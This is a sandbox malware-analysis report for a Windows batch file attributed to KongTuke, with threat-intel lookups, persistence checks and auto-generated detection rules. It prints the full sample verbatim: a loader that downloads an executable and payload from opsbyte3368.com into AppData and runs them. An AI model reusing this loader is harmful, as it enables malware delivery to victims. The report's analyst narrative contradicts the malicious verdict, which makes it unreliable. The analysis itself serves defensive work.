Malwagon
BIN
b File Analysis · submitted Sep 7, 2026 21:46 · 1.2 KB
2reg 5IOCs
Malicious80 Completed Public
Get sample Report Sign in

Malicious

80/100

10 points past the malicious line at 70.

Clean0-34 Suspicious35-69 Malicious70-100

Why this verdict

+80
Threat intelligence
  • MalwareBazaar known sample: KongTuke
  • Known malicious hash (feed): malwarebazaar: n/a

Analysis layers

Static ran no points
Dynamic ran no points
Threat intel ran moved the score
AI ran no points

Sample

TypeFile
MIMEtext/plain

Run conditions

Sandbox OSWindows 10
EnvironmentWorkgroup
InternetIsolated
Execution134s
Guest hardware2 vCPU4095 MB RAM

Structure

What the file is made of: headers, imports, how it was built and whether it was signed.

Signature
Format: plain text[CRLF]
Not packed
Identity
File
typeASCII text, with CRLF line terminators
size1.2 KB
entropy5.4284
Packing
Not packed
The file's code is readable on disk - nothing is compressed or encrypted around it.
0/100
packer confidence
Static analysis reads this file directly Nothing is hiding the code from a static pass, so what the file contains is what the report shows.
Indicators weighed

Packer detection looks at a program's entry point, sections and entropy. This file is not a program image, so there was nothing of that kind to assess.

File content

13 lines · 1.2 KB

The sample verbatim, shown as inert text - nothing here is interpreted by this page.

set d=%appdata%
echo begin>"%d%\bat.txt"
set _h=https://opsbyte3368.com/healthz
set _pe=0
for /f "tokens=3" %a in ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable 2^>nul ^| findstr "0x1"') do set _pe=1
if "%_pe%"=="1" for /f "tokens=2,*" %a in ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer 2^>nul ^| find "REG_SZ"') do set "_p=%b"
if defined _p (curl -x "%_p%" --proxy-negotiate --proxy-ntlm -U : -so "%d%\TRegSvr.exe" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=e" >nul 2>&1) else (curl -so "%d%\TRegSvr.exe" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=e" >nul 2>&1)
if exist "%d%\TRegSvr.exe" (echo exe ok>>"%d%\bat.txt") else (echo exe no>>"%d%\bat.txt"&exit 1)
if defined _p (curl -x "%_p%" --proxy-negotiate --proxy-ntlm -U : -so "%d%\vclimg370.bpl" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=b" >nul 2>&1) else (curl -so "%d%\vclimg370.bpl" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=b" >nul 2>&1)
if exist "%d%\vclimg370.bpl" (echo bpl ok>>"%d%\bat.txt") else (echo bpl no>>"%d%\bat.txt"&exit 1)
echo N6Ak6OEK opsbyte3368.com>"%d%\t"
cd /d "%d%"
start /b "" "%d%\TRegSvr.exe" -q "%d%\vclimg370.bpl"

Extracted strings

showing 13
  • set d=%appdata%
  • echo begin>"%d%\bat.txt"
  • set _h=https://opsbyte3368.com/healthz
  • set _pe=0
  • for /f "tokens=3" %a in ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable 2^>nul ^| findstr "0x1"') do set _pe=1
  • if "%_pe%"=="1" for /f "tokens=2,*" %a in ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer 2^>nul ^| find "REG_SZ"') do set "_p=%b"
  • if defined _p (curl -x "%_p%" --proxy-negotiate --proxy-ntlm -U : -so "%d%\TRegSvr.exe" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=e" >nul 2>&1) else (curl -so "%d%\TRegSvr.exe" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=e" >nul 2>&1)
  • if exist "%d%\TRegSvr.exe" (echo exe ok>>"%d%\bat.txt") else (echo exe no>>"%d%\bat.txt"&exit 1)
  • if defined _p (curl -x "%_p%" --proxy-negotiate --proxy-ntlm -U : -so "%d%\vclimg370.bpl" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=b" >nul 2>&1) else (curl -so "%d%\vclimg370.bpl" "https://opsbyte3368.com/ue?t=N6Ak6OEK&f=b" >nul 2>&1)
  • if exist "%d%\vclimg370.bpl" (echo bpl ok>>"%d%\bat.txt") else (echo bpl no>>"%d%\bat.txt"&exit 1)
  • echo N6Ak6OEK opsbyte3368.com>"%d%\t"
  • cd /d "%d%"
  • start /b "" "%d%\TRegSvr.exe" -q "%d%\vclimg370.bpl"

Stack and decoded strings were not recovered: this file format is not eligible for string emulation. Only literal strings present in the file are listed above.

Screen recording

8 frames · screen recording · 134s
Screen recording frame
1 / 8
0:00 · 1/8

Behavior summary

ran 134s

no notable behavior observed

LaunchedC:\Users\user\Desktop\b.exe
Privilegestandard
Telemetry sources: Kernel ETW (2 of 76 events) keydiff: 1

No WMI attributed to the sample. The WMI-Activity trace was running and recorded 930 operations on the machine during the run; none of them came from the sample's process tree.

No network activity - the run was isolated

This detonation was given no internet connection, so a sample that wanted to reach out could not. An empty section here says nothing about whether it tried.

Process tree

What ran during the detonation, and what each process did. Select a node to see the activity attributed to it.

No processes were captured

This run recorded no process activity. A hash lookup and a URL analysis never open a Windows VM, and a detonation that produced no telemetry says so on the report.

0Mechanisms found
90Methods checked
0ATT&CK techniques
NONEHighest severity

Established mechanisms

clean

No persistence established

None of the 90 auto-start methods below were established during this run.

Detection coverage

0 / 90

Every auto-start method checked on this sample, grouped by family. A method with no result is reported clean.

Logon & Startup 22 clean
  • Active Setup Installed Component T1547.014 clean
  • Explorer Delay-Load Object T1547.001 clean
  • Explorer Run Key T1547.001 clean
  • Explorer SharedTaskScheduler T1547.001 clean
  • Group Policy Extension DLL T1547.004 clean
  • Group Policy Run Key T1547.001 clean
  • Logon Script T1037.001 clean
  • RDP WDS Startup Program T1547.001 clean
  • Registry Run Key T1547.001 clean
  • Registry RunEx Key T1547.001 clean
  • Registry RunOnce Key T1547.001 clean
  • Registry RunOnceEx Key T1547.001 clean
  • Registry RunServices Key T1547.001 clean
  • Startup Folder Item T1547.001 clean
  • Startup Folder Redirection T1547.001 clean
  • Terminal Services Initial Program T1547.001 clean
  • Winlogon GINA DLL T1547.004 clean
  • Winlogon MPNotify Value T1547.004 clean
  • Winlogon Notify Package T1547.004 clean
  • Winlogon Shell Value T1547.004 clean
  • Winlogon Taskman Value T1547.004 clean
  • Winlogon Userinit Value T1547.004 clean
Services & Tasks 9 clean
  • BITS Job T1197 clean
  • Print Monitor DLL T1547.010 clean
  • Print Processor DLL T1547.012 clean
  • Scheduled Task T1053.005 clean
  • Scheduled Task Registry Implant T1053.005 clean
  • Service Control Manager Security Descriptor T1574.011 clean
  • Service DLL Hijack T1543.003 clean
  • Time Provider DLL T1547.003 clean
  • Windows Service Creation T1543.003 clean
Execution Hijack 17 clean
  • .NET Managed Debugger T1546.012 clean
  • Accessibility Tool Hijack T1546.008 clean
  • AeDebug Postmortem Debugger T1546.012 clean
  • App Paths Hijack T1546.012 clean
  • Application Shim Database T1546.011 clean
  • Boot Verification Program T1547.002 clean
  • Command Processor AutoRun T1546.011 clean
  • Explorer Load Value T1547.001 clean
  • Explorer MyComputer Tool Hijack T1546.001 clean
  • Registry Image File Execution Options T1546.012 clean
  • Screensaver Hijack T1546.002 clean
  • Setup ErrorHandler Script T1546 clean
  • Shell Open Command Hijack T1546.001 clean
  • SilentProcessExit Monitor T1546.012 clean
  • Telemetry Controller Command T1546.015 clean
  • WER ReflectDebugger T1546.012 clean
  • Windows Error Reporting Debugger T1546.012 clean
DLL Load Order 12 clean
  • .NET CLR Profiler DLL T1574.012 clean
  • .NET Startup Hook DLL T1574 clean
  • AppCert DLLs T1546.009 clean
  • AppInit DLLs T1546.010 clean
  • AutodialDLL Winsock Injection T1546.006 clean
  • DLL Search-Order Hijack T1574.001 T1574.002 clean
  • DNS Server Plugin DLL T1574.001 clean
  • HTML Help Helper DLL T1546 clean
  • KnownDLLs Manipulation T1574.001 clean
  • Natural Language Platform DLL Override T1546 clean
  • Netsh Helper DLL T1546.007 clean
  • Winsock Layered Service Provider T1546.006 clean
COM & Browser 6 clean
  • Browser Extension T1176 clean
  • Browser Helper Object T1176 clean
  • COM Server Hijack T1546.015 clean
  • HTML Help COM Object Hijack T1546.015 clean
  • Shell Context Menu Handler T1546.001 clean
  • Shell Extension Handler T1546.001 clean
Security Providers & Accounts 11 clean
  • Account RID Hijack T1098 clean
  • AMSI Provider T1562.001 clean
  • Credential Provider T1547.014 clean
  • DSRM Admin Logon Backdoor T1556 clean
  • Hidden Local Account T1136.001 clean
  • LSA Authentication Package T1547.002 clean
  • LSA Extension DLL T1547.005 clean
  • LSA Notification Package T1547.005 clean
  • LSA Security Package T1547.005 clean
  • Network Provider DLL T1556.008 clean
  • Security Support Provider T1547.005 clean
Scripting & Applications 9 clean
  • Netsh Port Proxy T1090.001 clean
  • Office Add-in T1137.006 clean
  • Office Executable Sideload T1574.002 clean
  • Office Startup Template T1137.001 clean
  • Office Test Key T1137.002 clean
  • Power Automate Flow T1546 clean
  • PowerShell Profile T1546.013 clean
  • Windows Terminal Startup Action T1546 clean
  • WMI Event Subscription T1546.003 clean
Boot & Firmware 4 clean
  • BootExecute Native Image T1547.002 clean
  • PlatformExecute Native Image T1547.002 clean
  • SetupExecute Native Image T1547.002 clean
  • UEFI / Bootkit Artifact T1542.003 T1542.001 clean

File activity summary

create 0 write 0 modify 0 delete 0 rename 0

File & registry ops

0 file · 2 registry · sample scope
OperationTargetProcess
create
Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters
- pid 3880
setvalue
Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters
TrapPollTimeMilliSecs = 15000
read back
-
2 reported a hit 18 answered no 3 had nothing to check
2Sources with a hit
20Sources queriedof 23 available
486.1kFeed records
0Could not answer

File reputation

2 of 7 listed
SourceChecksResultDetailFeed
MalwareBazaar File hash KongTuke ps1 live lookup
MalwareBazaar hash feed File hash listed malwarebazaar: KongTuke 2,535 records
5 minutes ago
filescan.io File hash suspicious (0/17 engines) - below the scoring threshold - live lookup
MalwareBazaar ransomware feed File hash clean not in feed 8,271 records
4 hours ago
ThreatFox hash IOCs File hash clean not in feed 1,632 records
6 minutes ago
URLhaus payload hashes File hash clean not in feed 1,474 records
5 minutes ago
VirusTotal File hash clean - live lookup

Hash lookups only - the sample itself is never uploaded to any third party.

Network indicators

8 clear
SourceChecksResultDetailFeed
blocklist.de IP / domain / URL clean 3 observed indicators, none listed 24.5k records
5 minutes ago
CINS Army IP / domain / URL clean 3 observed indicators, none listed 15k records
5 minutes ago
Emerging Threats IP / domain / URL clean 3 observed indicators, none listed 580 records
6 minutes ago
Feodo Tracker IP / domain / URL clean 3 observed indicators, none listed 5 records
6 minutes ago
IPsum IP / domain / URL clean 3 observed indicators, none listed 17.7k records
6 minutes ago
Phishing.Database IP / domain / URL clean 3 observed indicators, none listed 391.1k records
4 hours ago
ThreatFox IP / domain / URL clean 3 observed indicators, none listed 1,632 records
6 minutes ago
URLhaus IP / domain / URL clean 3 observed indicators, none listed 5,155 records
6 minutes ago

TLS fingerprints

0 clear
SourceChecksResultDetailFeed
abuse.ch JA3 blocklist JA3 / JA4 not checked no TLS client fingerprint observed 97 records
16 hours ago
SSL blocklist JA3 / JA4 not checked no TLS client fingerprint observed 10.7k records
6 minutes ago

Detection rules

2 clear
SourceChecksResultDetailFeed
Sigma rules Behavior log clean - 2,275 records
22 hours ago
YARA rules Sample content clean no rule matched 110 records
6 minutes ago

Tooling catalogs

3 clear
SourceChecksResultDetailFeed
LOLBootloaders File hash clean not a known vulnerable bootloader 520 records
5 minutes ago
LOLDrivers File hash clean not a known vulnerable driver 2,306 records
6 minutes ago
LOLRMM Names and domains clean 1 name/domain indicator checked, no remote-management tooling 322 records
5 minutes ago
LOLBAS Process image paths not checked no process image path observed to check 244 records
6 minutes ago

Analyst narrative

The analysis of the sample indicates that it successfully executed within the sandbox environment. 1. **Initial Access**: The sample does not exhibit any clear indicators of initial access mechanisms such as exploitation of vulnerabilities or phishing attempts. However, the presence of URLs suggests potential communication with external servers. 2. **Execution**: The sample was executed, and while no notable behavior was observed during its runtime, it did interact with the Windows registry. Specifically, it created and modified a registry key under `Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters`, which may indicate an attempt to configure settings related to network management. 3. **Persistence**: There are no direct indicators of persistence mechanisms employed by the sample. The registry operations observed do not suggest a typical persistence strategy. 4. **Defense Evasion**: There are no explicit defense evasion techniques noted in the behavior summary. The sample did not exhibit any behaviors that would typically be associated with evading detection. 5. **Command and Control (C2)**: The presence of multiple URLs (hxxps://opsbyte3368.com) indicates potential command and control infrastructure. However, there is no evidence of successful communication or data exfiltration. 6. **Impact**: The impact of the sample remains unclear due to the lack of notable behavior during execution. The registry modifications could imply an intent to affect system behavior, but without further context, the actual impact cannot be determined. **Verdict Rationale**: The sample executed without triggering any significant malicious behavior, and while it did interact with the registry, the overall lack of notable actions and the absence of malicious indicators lead to a conclusion that the sample does not exhibit clear malicious intent. However, the presence of C2 URLs warrants further investigation.

Evasion analysis

No evasive checkpoints detected.

2 malicious 0 suspicious 3 info
Attribution:KongTuke

Network indicators

3
SeverityTypeIndicatorDescription
info url https://opsbyte3368.com/healthz Extracted from the sample's strings
info url https://opsbyte3368.com/ue?t=N6Ak6OEK&f=e Extracted from the sample's strings
info url https://opsbyte3368.com/ue?t=N6Ak6OEK&f=b Extracted from the sample's strings

File indicators

2
SeverityTypeIndicatorDescription
malicious sample_sha256 62c5643a4d1ac485180b4fdcb79cb29119fcef3b42c5a7fbb5ab4d8cedae4866 Submitted sample (SHA256)
malicious sample_md5 1041afed2c77edc30cf1fe56fb6a8856 Submitted sample (MD5)

Sigma detections

0 matches of 2275 rules

The Sigma corpus was evaluated against this run's processes, registry, file, network, DNS and script activity. Nothing matched.

Generated rules

Sigma: auto_file_2387_sigma_reg

Auto-generated
title: Auto-generated registry behavior rule (sandbox scan 2387)
id: sandbox-auto-2387-reg
status: experimental
description: Auto-generated from sandbox scan 2387
logsource:
    category: registry_event
    product: windows
detection:
    selection:
        TargetObject|contains:
            - 'Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters'
    condition: selection
level: medium

Suricata/Snort: auto_file_2387_suricata

Auto-generated
alert http any any -> any any (msg:"sandbox auto scan 2387 C2 URL"; http.uri; content:"/healthz"; sid:15978368; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2387 C2 URL"; http.uri; content:"/ue?t=N6Ak6OEK&f=e"; sid:15978369; rev:1;)
alert http any any -> any any (msg:"sandbox auto scan 2387 C2 URL"; http.uri; content:"/ue?t=N6Ak6OEK&f=b"; sid:15978370; rev:1;)

YARA: auto_file_2387_yara

Auto-generated
rule auto_file_2387_yara
{
    meta:
        description = "Auto-generated from scan 2387"
        author = "sandbox auto-generator"
        anchors = "5 independent regions"
    strings:
        $s0 = "start /b \"\" \"%d%\\TRegSvr.exe\" -q \"%d%\\vclimg370.bpl\"" ascii fullword
        $s1 = "echo N6Ak6OEK opsbyte3368.com>\"%d%\\t\"" ascii fullword
        $s2 = "set _h=https://opsbyte3368.com/healthz" ascii fullword
        $s3 = "echo begin>\"%d%\\bat.txt\"" ascii fullword
        $s4 = "set _pe=0" ascii fullword
    condition:
        filesize < 65536 and all of them
}

Extracted files

What came out of the sample: unpacked payloads, carved objects and captured memory. Each one is stored by content hash, so the same object extracted twice is the same row.

No extracted files

Nothing was unpacked or carved out of this sample. Packed samples, documents with embedded objects and installers are the ones that usually produce artifacts here.

Export & download

/s/2387

The report downloads - PCAP and the SIEM/TIP exports - are a paid-plan feature. Sign in with a paid plan to export this report.

AI analysis report

An enterprise report with an AI-written executive summary, threat assessment, kill chain, and recommendations, plus the derived evidence (verdict, MITRE ATT&CK, network, file modifications, dropped files, IOCs) and screenshots. The AI narrative is built from derived analysis data only, so the raw sample never leaves the host (no-upload and AI-boundary preserved).

Public analyses of this file

1 run
SubmittedEnvironmentVerdictScore
2026-09-07 21:46 Shown below Static analysis Malicious 80/100